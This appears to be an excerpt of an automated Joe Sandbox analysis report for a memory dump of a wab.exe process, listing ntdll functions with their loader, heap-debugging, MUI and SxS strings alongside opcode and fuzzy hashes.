Snapshot File: hcaresult_1_2_400000_wab.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 4bfb207ea0738caae6b9b329a31b9eabac1b9da52ccbf7274c8fd641ed6f582a
Instruction ID: b053ba97ef85fd01e033e216238dc9b16f322f47cbc3a8d3136ad68fc0b446e3
Opcode Fuzzy Hash: 4bfb207ea0738caae6b9b329a31b9eabac1b9da52ccbf7274c8fd641ed6f582a
Instruction Fuzzy Hash: 6FE04F723002187BC620AB5ADC01F9B776CDFC5714F00401AFA48A7241DA74BA1187B5

Function 02EB2C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 02EB2C24

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 925a99cff251ef6cb1d5ebf318f83557e5f40ef0fae0ca9111a15c84abfe778e
Instruction ID: 4dfe8b5fd751a6b4b2406485db54964088b8fd6cbc8bd6d1d3194c9e2c9db880
Opcode Fuzzy Hash: 925a99cff251ef6cb1d5ebf318f83557e5f40ef0fae0ca9111a15c84abfe778e
Instruction Fuzzy Hash: FDB09B719415C5C5DE52E7604B097577A006FD0706F25D075D3030641E4739C5D1F575

Non-executed Functions

Function 02EF2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

UnloadEventTraceDepth, xrefs: 02EF24C0
ExecuteOptions, xrefs: 02EF25A0
LdrpInitializeExecutionOptions, xrefs: 02EF317D
minkernel\ntdll\ldrinit.c, xrefs: 02EF3187
DisableHeapLookaside, xrefs: 02EF246D
Initializing the application verifier package failed with status 0x%08lx, xrefs: 02EF3176
FrontEndHeapDebugOptions, xrefs: 02EF2489
UseImpersonatedDeviceMap, xrefs: 02EF251C
MinimumStackCommitInBytes, xrefs: 02EF2BB0
RaiseExceptionOnPossibleDeadlock, xrefs: 02EF2579
@, xrefs: 02EF2B74
ShutdownFlags, xrefs: 02EF24A1
GlobalFlag, xrefs: 02EF2F3F, 02EF3059
MaxDeadActivationContexts, xrefs: 02EF2D82
MaxLoaderThreads, xrefs: 02EF24EC
TracingFlags, xrefs: 02EF2549
DisableExceptionChainValidation, xrefs: 02EF275F
@, xrefs: 02EF2942
GlobalFlag2, xrefs: 02EF2FC0
CFGOptions, xrefs: 02EF2967

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 24ff0dbdac07b0bf09d0a5e9d3b9c66b17494530e90b7d8cf0a77d33aa207a62
Instruction ID: 3787058795c51304f380debba8f28e174dc583b5763377f4282ff7e52980a126
Opcode Fuzzy Hash: 24ff0dbdac07b0bf09d0a5e9d3b9c66b17494530e90b7d8cf0a77d33aa207a62
Instruction Fuzzy Hash: C892AE716847819BE761DE24C880BABB7E9BF84758F04981DFF94D7290D770E844CB92

Function 02EA8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EE54E2
Critical section debug info address, xrefs: 02EE541F, 02EE552E
Critical section address., xrefs: 02EE5502
corrupted critical section, xrefs: 02EE54C2
Thread identifier, xrefs: 02EE553A
undeleted critical section in freed memory, xrefs: 02EE542B
Critical section address, xrefs: 02EE5425, 02EE54BC, 02EE5534
double initialized or corrupted critical section, xrefs: 02EE5508
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EE540A, 02EE5496, 02EE5519
8, xrefs: 02EE52E3
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02EE54CE
Invalid debug info address of this critical section, xrefs: 02EE54B6
Thread is in a state in which it cannot own a critical section, xrefs: 02EE5543
Address of the debug info found in the active list., xrefs: 02EE54AE, 02EE54FA

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 978a5a31d414b0ab428db43fcfa56ffc4f25333bb0da8471ef263550d76aef0d
Instruction ID: d407f5bf1265940a418d84ec651db0db4999b80569b1aa013ed723ed89a6e9a6
Opcode Fuzzy Hash: 978a5a31d414b0ab428db43fcfa56ffc4f25333bb0da8471ef263550d76aef0d
Instruction Fuzzy Hash: 81818C70A80358AFEF20CF99C845BAEBBB5FF48718F50A159F906B7640D375A984CB50

Function 02F212ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap block at %p has corrupted PreviousSize (%lx), xrefs: 02F2176D
Heap block at %p has incorrect segment offset (%x), xrefs: 02F2181A
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 02F2186B
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 02F218A5
HEAP: , xrefs: 02F21706, 02F21756, 02F217A8, 02F21809, 02F2184D, 02F21895, 02F218E6
HEAP[%wZ]: , xrefs: 02F216CD, 02F216F9, 02F21749, 02F2179B, 02F217FC, 02F21840, 02F218D9
Free Heap block %p modified at %p after it was freed, xrefs: 02F2171B
Heap block at %p is not last block in segment (%p), xrefs: 02F217B7
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 02F218F8

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 0912884eff43e6567cdc3c89e0e88a9b53781fd9ebf9f28cdc1ddbfd1eeea456
Instruction ID: 53871fa8d77801e9b709ba24cc5ccc9349e3d35215bc34c9829c3c3a092f2e5a
Opcode Fuzzy Hash: 0912884eff43e6567cdc3c89e0e88a9b53781fd9ebf9f28cdc1ddbfd1eeea456
Instruction Fuzzy Hash: 3612F231A40655DFD725CF28C445BBBBBF2FF0A788F088459E58A8B642D734E888CB54

Function 02E6D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

@, xrefs: 02E6D663
Control Panel\Desktop, xrefs: 02E6D45D
@, xrefs: 02E6D3E9
Control Panel\Desktop\MuiCached, xrefs: 02E6D62B
PreferredUILanguages, xrefs: 02E6D4B8, 02E6D4C5
@, xrefs: 02E6D49D
MachinePreferredUILanguages, xrefs: 02E6D685
PreferredUILanguagesPending, xrefs: 02ECA8DE
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02E6D3B6

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: ff4d77f3477db74dcc0d2e36759c4c0bf20be307cab16d65ba18e95a2e7d53a6
Instruction ID: 7cba1a2ea46e8283ad4492cc7538d5464182879974d366fe0bd013ceb8a472a6
Opcode Fuzzy Hash: ff4d77f3477db74dcc0d2e36759c4c0bf20be307cab16d65ba18e95a2e7d53a6
Instruction Fuzzy Hash: 70B1DF726883559FC711CF64C884BAFB7E8AF88798F41992EF988D7240D730D905CB92

Function 02F09179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON

Download Yara Rule

Strings

%s\%u-%u-%u-%u, xrefs: 02F09422
\BaseNamedObjects, xrefs: 02F0949E
%s\%ld\%s, xrefs: 02F0948D
BaseNamedObjects, xrefs: 02F09477, 02F0947C
\AppContainerNamedObjects, xrefs: 02F094AB, 02F094B9
AppContainerNamedObjects, xrefs: 02F0946E, 02F094D6
\Sessions, xrefs: 02F09488
Global\Session\%ld%s, xrefs: 02F094C5

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
API String ID: 0-3063724069
Opcode ID: 62c68af7a2839c84c62cb5c6bec83c3c94265254cb0a9bcad8256f8b63e95d3f
Instruction ID: 474ef315a91f48c08f764694c19ef4634d16ad0ca1c36c3e49cee457332415b2
Opcode Fuzzy Hash: 62c68af7a2839c84c62cb5c6bec83c3c94265254cb0a9bcad8256f8b63e95d3f
Instruction Fuzzy Hash: 0BD10872844351AFD721DA54C880BAFB7E9AF84B94F04892DFB84A7191E7B0C944DFD2

Function 02F20274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 02F204D3
RtlReAllocateHeap, xrefs: 02F202BF, 02F20362
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 02F206EA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 02F2069F
Just reallocated block at %p to %Ix bytes, xrefs: 02F205F1
HEAP: , xrefs: 02F203A6, 02F204B5, 02F205DD, 02F20682, 02F206D9
HEAP[%wZ]: , xrefs: 02F20399, 02F204A8, 02F205D0, 02F20675, 02F206CC
About to reallocate block at %p to %Ix bytes, xrefs: 02F203BA

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 0c8bb461636be945016f7b256bab510e52d91d49a82ae24786bc57c3792258b5
Instruction ID: ac58117cfd43eb36c0b26971f64a1cce648a248729f81175900edd05e83bddaf
Opcode Fuzzy Hash: 0c8bb461636be945016f7b256bab510e52d91d49a82ae24786bc57c3792258b5
Instruction Fuzzy Hash: 1CD1F032A806A8DFDB21DF68C445AADBBF2FF5A784F08C05DE5469B251CB359848CF14

Function 02E6D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 02E6D146
@, xrefs: 02E6D2AF
@, xrefs: 02E6D0FD
@, xrefs: 02E6D313
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 02E6D2C3
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 02E6D0CF
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 02E6D262
Control Panel\Desktop\LanguageConfiguration, xrefs: 02E6D196

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: 294a572fc6c2b7d336f6461760db7b56c336e2e6e95f99f9f9857331ade555b0
Instruction ID: 550f83107606afcb933c4ee50a8346d4e7d6b29ec385c192b8858dcf7b435a09
Opcode Fuzzy Hash: 294a572fc6c2b7d336f6461760db7b56c336e2e6e95f99f9f9857331ade555b0
Instruction Fuzzy Hash: AAA1A2716883459FD721CF60C984BABB7E8BF88759F40992EF98896240D774D908CF93

Function 02E6F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

(!TrailingUCR), xrefs: 02ECE3A9
((LONG)FreeEntry->Size > 1), xrefs: 02ECE0B3
(LONG)FreeEntry->Size > 1, xrefs: 02ECE291
HEAP: , xrefs: 02ECDF64, 02ECE0A8, 02ECE286, 02ECE39E
(UCRBlock != NULL), xrefs: 02ECDF6F
HEAP[%wZ]: , xrefs: 02ECDF57, 02ECE09B, 02ECE279, 02ECE391

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: a31419a74e96e05d9b20af0ec3e2357e44d7877295ea8479df52314a392da3e2
Instruction ID: 55255c0e66f7b8d696d90f04adb1e3aa2e70f03856c1aaff8d3c9fd87880371c
Opcode Fuzzy Hash: a31419a74e96e05d9b20af0ec3e2357e44d7877295ea8479df52314a392da3e2
Instruction Fuzzy Hash: 1642EF312842818FC314DF68D988B7ABBE5FF84748F18A96DF88A8B741D734D846CB51

Function 02E8B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrutil.c, xrefs: 02ED840D, 02ED84E1
API set, xrefs: 02ED83F4, 02ED83F9
SxS, xrefs: 02ED83ED
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 02ED84D0
LdrpPreprocessDllName, xrefs: 02ED8403, 02ED84D7
DLL %wZ was redirected to %wZ by %s, xrefs: 02ED83FC

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: e515f807553430fb45d6942b6acfeeffb8b0f37ee7fd58b3aab48514396d1b3f
Instruction ID: 6f11683abfd36be4467b6bd6958fb48d887690f3cfffdf34baa7ef8edefef91c
Opcode Fuzzy Hash: e515f807553430fb45d6942b6acfeeffb8b0f37ee7fd58b3aab48514396d1b3f
Instruction Fuzzy Hash: 45C15B71AC02159BDF24EB64C881BBEB765AF4570CF14F06DE88EEB290E7B09845C791

Function 02EA63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

_LdrpInitialize, xrefs: 02EE40DF, 02EE4141, 02EE4205, 02EE425F
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 02EE40D8
minkernel\ntdll\ldrinit.c, xrefs: 02EE40E9, 02EE414B, 02EE420F, 02EE4269
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 02EE41FE
Process initialization failed with status 0x%08lx, xrefs: 02EE413A
Delaying execution failed with status 0x%08lx, xrefs: 02EE4258

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: abd5c71f0eb12f4d60775d0c9b6f661521c3cbd0eaa3709e642a96d64fc4917d
Instruction ID: 0350a0f1324e171f24219c82bd7752a8e1f1d24a924e3a4bc0ab69a0b9db6907
Opcode Fuzzy Hash: abd5c71f0eb12f4d60775d0c9b6f661521c3cbd0eaa3709e642a96d64fc4917d
Instruction Fuzzy Hash: 38912A70EC03189BEF25DF54D858BAA77A5FF46B58F08E458EA167B2C0D7749801CB90

Function 02EAC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 02EE8181, 02EE81F5
Loading import redirection DLL: '%wZ', xrefs: 02EE8170
minkernel\ntdll\ldrinit.c, xrefs: 02EAC6C3
Unable to build import redirection Table, Status = 0x%x, xrefs: 02EE81E5
LdrpInitializeImportRedirection, xrefs: 02EE8177, 02EE81EB
LdrpInitializeProcess, xrefs: 02EAC6C4

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: e64d1f3ff2240205ab2cca7fec52ae8b2ec35ac728c46cac2f55d3a5122d747b
Instruction ID: 4a688fb14b80365a4a21a7142a06546f1544337021a27291b64baaa2491f0a9a
Opcode Fuzzy Hash: e64d1f3ff2240205ab2cca7fec52ae8b2ec35ac728c46cac2f55d3a5122d747b
Instruction Fuzzy Hash: 443145B16C43459FE610EF28D845E1AB392EFC0B58F04A958F9466B291E620EC04CBA2

Function 02EA2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 02EE2165
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 02EE2178
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 02EE21BF
SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 02EE219F
RtlGetAssemblyStorageRoot, xrefs: 02EE2160, 02EE219A, 02EE21BA
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 02EE2180

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: 8426882bc7e473391d362f6a46aa8ed6f25521e2bf0560c91ee2c40eaea3c568
Instruction ID: f246d9cf5cdbd1c243da09f39f8650e3b5f3815026c31564c3779a0c7bc13480
Opcode Fuzzy Hash: 8426882bc7e473391d362f6a46aa8ed6f25521e2bf0560c91ee2c40eaea3c568
Instruction Fuzzy Hash: EB31E632AC0224B7FB218E958C55FAAB769DB55B54F05E059FF067B240E270AF00C7A1

Function 02E951EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Allowed, xrefs: 02E9527B
WindowsExcludedProcs, xrefs: 02E9522A
Kernel-MUI-Number-Allowed, xrefs: 02E95247
Kernel-MUI-Language-Disallowed, xrefs: 02E95352
Kernel-MUI-Language-SKU, xrefs: 02E9542B

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 04bafcf36a00e2f03aaacddcea83283c537cd423404eaccc3067f4559678d266
Instruction ID: e861084ebf8432e7fa76796b5534a9f898fa8edc9ed9701e493c4af8b22a1de2
Opcode Fuzzy Hash: 04bafcf36a00e2f03aaacddcea83283c537cd423404eaccc3067f4559678d266
Instruction Fuzzy Hash: 04F13C72D80218EBCF16DFA4C980AEEB7B9FF08754F55946AE505A7210E7709E01CFA0

Function 02E9D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

$, xrefs: 02E9D86D
minkernel\ntdll\ldrinit.c, xrefs: 02EDF2D8
$, xrefs: 02E9D900
LdrShutdownProcess, xrefs: 02EDF2CE
Process 0x%p (%wZ) exiting, xrefs: 02EDF2C7

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
API String ID: 0-1975516107
Opcode ID: 6d6901c6892b4365bc01b98a8729697a250dba696d24498ada9a55345e7e7ef4
Instruction ID: 8124b992dd7811a34df6f29f4ce80decd93fdeb471384c980859910a2090b9d3
Opcode Fuzzy Hash: 6d6901c6892b4365bc01b98a8729697a250dba696d24498ada9a55345e7e7ef4
Instruction Fuzzy Hash: 9A51F171E842599FDF24EFA4C98479DBBB2FF04748F14E55AD8156B281C7709841CF90

Function 02E676B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON

Download Yara Rule

Strings

RtlFreeHeap, xrefs: 02ECB03F
, passed to %s, xrefs: 02ECB040
HEAP: , xrefs: 02ECB023
HEAP[%wZ]: , xrefs: 02ECB016
Invalid heap signature for heap at %p, xrefs: 02ECB02F

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
API String ID: 0-3061284088
Opcode ID: b0342518b7ebfeb6aca472027cfb1bb7e764ae25480440934bd76054d0bfbaac
Instruction ID: 81e4008da6cde52f747e2912b8ed909741833cb0a434ddffe6e183ff82f050f1
Opcode Fuzzy Hash: b0342518b7ebfeb6aca472027cfb1bb7e764ae25480440934bd76054d0bfbaac
Instruction Fuzzy Hash: 1101F9321C4144DEE3259758A50FF62BBE4EB42BBCF24E01DF00597550CFA55881C660

Function 02E870C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 02E87C96, 02E88696
HEAP: , xrefs: 02E87C7C, 02E8867F
HEAP[%wZ]: , xrefs: 02E87C6D, 02E88670

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 81b2329c86ae95a1eeffa4db543207fb71f92347a69cee004cfa347dcfa5d099
Instruction ID: c00701d768304771cce3c88e2cb9a99ae015c637cad605b1b401ae407ccf4a15
Opcode Fuzzy Hash: 81b2329c86ae95a1eeffa4db543207fb71f92347a69cee004cfa347dcfa5d099
Instruction Fuzzy Hash: 8113AF74A406198FDB25DF68C4907A9FBF2BF49308F64D1A9D88DAB381D734A845CF90

Function 02E81070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 02ED588F
@, xrefs: 02ED5A53
HEAP: , xrefs: 02ED5884
HEAP[%wZ]: , xrefs: 02ED5877

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: 6fa8cc5c898d9feeb8defaec37fcd6931d7fce7138579ba40dd256b9aa7ba6ac
Instruction ID: 6ce59f364b97c1c717d0ef1f3b41d9fc2dfd590d09baedbd47ecc16853ff8add
Opcode Fuzzy Hash: 6fa8cc5c898d9feeb8defaec37fcd6931d7fce7138579ba40dd256b9aa7ba6ac
Instruction Fuzzy Hash: 52926C71A80268CFEB24DF14CC44BA9B7B6BF45358F1591EAE98DAB240D7309E81CF51

Function 02E7A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 02E7A3FF
6, xrefs: 02E7A3F7
LdrResFallbackLangList Enter, xrefs: 02E7A3EF
8, xrefs: 02E7A3E7

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: aa031ceda1c60cf84ad2612480501fb1ac9403b8e9c4b97c68b4e2d329e799de
Instruction ID: 33c6bf7866fee326428566e2fcebf94e14cad96f7f3cc05627892ef73035b6fb
Opcode Fuzzy Hash: aa031ceda1c60cf84ad2612480501fb1ac9403b8e9c4b97c68b4e2d329e799de
Instruction Fuzzy Hash: AEC167712883828FC711DF58C544BAEB7E4BF84708F00A97AF9958B351E735CA4ACB52

Function 02EA273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() passed the empty activation context, xrefs: 02EE21DE
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 02EE22B6
.Local, xrefs: 02EA28D8
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 02EE21D9, 02EE22B1

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
